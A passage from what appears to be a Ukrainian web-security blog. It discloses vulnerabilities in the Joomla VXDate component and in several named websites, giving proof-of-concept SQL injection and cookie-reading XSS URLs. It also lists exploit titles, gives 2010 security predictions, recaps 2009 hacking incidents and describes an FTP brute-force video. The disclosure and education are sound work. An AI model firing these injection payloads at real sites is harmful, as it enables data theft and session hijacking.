Websecurity - Веб безпека

12.01.2010

У травні, 10.05.2009, я знайшов Full path disclosure, SQL Injection та Cross-Site Scripting уразливості в компоненті VXDate (com_vxdate) для Joomla. Дані уразливості я виявив на одному веб сайті. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливість в JVClouds3D для Joomla.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.

13.03.2010

Full path disclosure:

http://site/index.php?option=com_vxdate&ct=’

http://site/index.php?option=com_vxdate&ct=1&md=details&id=’

http://site/index.php?option=com_vxdate&ct=1&md=editform&id=’

SQL Injection:

http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5
http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5

XSS:

http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі потенційно всі версії VXDate.

В даній добірці експлоіти в веб додатках:

• Facil Helpdesk (RFI/LFI/XSS) Multiples Remote Vulnerabilities (деталі)
• PHPCityPortal (Auth Bypass) Remote SQL Injection Vulnerability (деталі)
• Arab Portal 2.2 (Auth Bypass) Blind SQL Injection Exploit (деталі)
• SmilieScript <= 1.0 (Auth Bypass) SQL Injection Vulnerability (деталі)
• Joomla Component Kunena Forums (com_kunena) bSQL Injection Exploit (деталі)
• CMS Made Simple <= 1.6.2 Local File Disclosure Vulnerability (деталі)
• Mini-CMS 1.0.1 (page.php id) SQL Injection Vulnerability (деталі)
• Papoo CMS 3.7.3 Authenticated Arbitrary Code Execution Vulnerability (деталі)
• Embedthis Appweb 3.0b.2-4 Remote Buffer Overflow PoC (деталі)
• Neostrada Livebox Remote Network Down Exploit (деталі)

Як і в попередні роки, надам свої прогнози розвитку веб безпеки в новому році. Але спочатку зроблю огляд тих прогнозів, що я давав на 2009 рік.

На початку минулого року я зробив свої прогнози стосовно розвитку галузі веб безпеки в минулому році. І зараз я оціню наскільки справдилися мої попередні прогнози.

1. Уразливості XSS в минулому році, як і раніше, все більше поширювалися (вони були найпоширенішими уразливостями веб додатків).
2. Більше почали проводитися CSRF-атаки, зокрема з використанням ClickJacking (про Clickjacking атаки я вже розповідав раніше).
3. Фішинг став ще більш поширеним явищем. Як я розповідав в статті Сучасний стан фішинг-атак в Інтернеті, торік число фішингових атак досягло дворічного максимуму.
4. Insufficient Anti-automation уразливості стали більш поширеними, зокрема атаки на капчі. Що в тому числі збільшило кількість реєстрацій на поштових сервісах та кількість спаму з них.
5. Значно зросла кількість заражених вірусами веб сторінок в Інтернеті. Зокрема в Уанеті в 2009 я виявив 65 інфікованих сайтів, а в 2008 лише 4 сайти.
6. Збільшилися атаки на соціальні мережі, в тому числі на Twitter.
7. Значно зросла хакерська активність (зокрема в Уанеті зростання на 79,5%).

Як видно всі мої попередні прогнози переважно збулися .

А тепер мій прогноз розвитку галузі веб безпеки в 2010 році.

1. Уразливості XSS будуть поширюватися й надалі.
2. Збільшаться випадки витоків важливої інформації.
3. Все більше будуть використовуватися уразливості в браузерах для атак на користувачів.
4. Фішинг стане ще більш розповсюдженим.
5. Продовжить зростати кількість заражених вірусами веб сторінок.
6. Атаки на соціальні мережі продовжать збільшуватися.
7. Продовжиться подальше зростання хакерської активності.

Продовжуючи розпочату традицію, після попереднього відео про взлом Java додатків, пропоную новий відео секюріті мануал. Цього разу відео про підбір паролів до FTP. Рекомендую подивитися всім хто цікавиться цією темою.

Brute Force FTP Escalation

В даному відео ролику демонструється Brute Force атака на FTP. Після підбору паролю до FTP сервера на Windows XP, отримується telnet доступ до системи. А потім й доступ через RealVNC з захопленням акаунту адміністратора. Рекомендую подивитися дане відео для розуміння атак через FTP.

В даній добірці уразливості в веб додатках:

• Vulnerability in yelp (деталі)
• Living CMS Cross-Site Scripting vulnerability (деталі)
• iNTERNET.cms Cross-Site Scripting vulnerability (деталі)
• iNTERNET.cms Cross-Site Scripting vulnerability (деталі)
• EXcms Root directory disclosure vulnerability (деталі)
• ELDORADO CMS Multiple Vulnerabilities (деталі)
• AKmedia CMS SQL Injection vulnerability (деталі)
• ABO.CMS Multiple Vulnerabilities (деталі)
• A.CMS Multiple Vulnerabilities (деталі)
• Neostrada Livebox Remote Network Down PoC Exploit (деталі)

У травні, 15.05.2007, я знайшов Cross-Site Scripting та Redirector уразливості на проекті http://adtime.ru (веб брокер). В даному випадку на http://r.adtime.ru. Про що найближчим часом сповіщу адміністрацію проекту.

XSS:

• alert(document.cookie)
• цікавий

Redirector:

http://r.adtime.ru/?http://websecurity.com.ua

Раніше я вже писав про п’ятірку найгучніших випадків витоку даних у 2009 році, а зараз розповім про найбільш гучні справи 2009 року в галузі безпеки.

Як повідомляє www.xakep.ru в публікації 2009 - cамые громкие дела ушедшего года, в минулому році було багато цікавих секюріті справ.

Серед взломів найбільш виділився взлом хакерами з команди Zero for 0wned aka ZF0 сайтів двох секюріті експертів: Кевіна Мітника і Дена Камінски. Хакери взломали їх сайти та виклали всю отриману особисту інформацію експертів в публічний доступ . Якщо сайти Мітника взламують вже не вперше (цього разу хакнули його блог на WordPress), то сайти Камінски раніше не взламували. Але все буває вперше .

Також торік дісталося війсковим США. Була взломана мережа Пентагона і викрадені дані по проекту Joint Strike Fighter. А також був взломаний сайт army.mil - офіційний сайт армії США.

Найбільш поширеним в Інтернеті в 2009 році став вірус відомий як Conficker aka Downloadup aka Kido. Зазначу, що в цьому році він також продовжує очолювати вірусні рейтинги.

Також торік відбувалися події пов’язані з QIP. Зокрема був взломаний офіційний сайт месенджера qip.ru, а потім була виявлена серйозна уразливість на сайті games.qip.ru, що призвела до чималого витоку даних.

Також торік хакерами з Team Elite був взломаний сайт MI5 - mi5.gov.uk (через локальну пошукову систему). Зазначу, що в 2007 році я вже знаходив уразливості на www.mi5.gov.uk, причому як раз в локальному пошуковці сайта, що використовував Google Search Appliance .

В минулому році відбувався судовий процес проти The Pirate Bay. Що призвело до DDoS атак та взломів сайтів антипіратських організацій. І навіть до DDo$-атаки - розподіленої атаки на відмову в доларах.

Також в минулому році було багато атак на соціальні мережі. Зокрема найбільш гучними були взломи Twitter. Окрім цього торік були гучні справи й арешти. Такі як справа з The Pirate Bay, арешт Альберта Гонсалеса, хакера з Казахстану та засудження українця Максима Ястремського у Турції. Про справу Ястремського я вже писав і весною 2009 його засудили на 30 років за крадіжку і продаж номерів кредитних карт, на чому він заробив 11 мільйонів долларів.

24.09.2009

У лютому, 02.02.2009, я знайшов Cross-Site Scripting уразливості на проекті http://ftp-poisk.kiev.ua (пошуковець по ftp). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

11.03.2010

XSS (IE):

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)

Дані уразливості вже виправлені.

В даній добірці експлоіти в веб додатках:

• Banner Exchange Script 1.0 (targetid) Blind SQL Injection Vuln (деталі)
• PHotoLa Gallery <= 1.0 (Auth Bypass) SQL Injection Vulnerability (деталі)
• Alwasel 1.5 Multiple Remote SQL Injection Vulnerabilities (деталі)
• PhotoPost PHP 3.3.1 (XSS/bSQL) Multiple Remote Vulnerabilities (деталі)
• Spiceworks 3.6 Accept Parameter Overflow Crash Exploit (деталі)
• Logoshows BBS 2.0 (DD/ICH) Multiple Remote Vulnerabilities (деталі)
• Logoshows BBS 2.0 (Auth Bypass) SQL Injection Vulnerability (деталі)
• Joomla Component com_pms 2.0.4 (Ignore-List) SQL Injection Exploit (деталі)
• IsolSoft Support Center 2.5 (RFI/LFI/XSS) Multiples Vulnerabilities (деталі)
• PoC exploit for the TLS renegotiation vulnerability (деталі)

У серпні, 19.08.2009, я знайшов Brute Force та Information Leakage уразливості на проекті http://banner.b-one.com.ua (банерна система). Про що найближчим часом сповіщу адміністрацію проекту.

Стосовно дірок на сайтах банерних систем в останнє я писав про уразливості в багатьох банерних системах.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.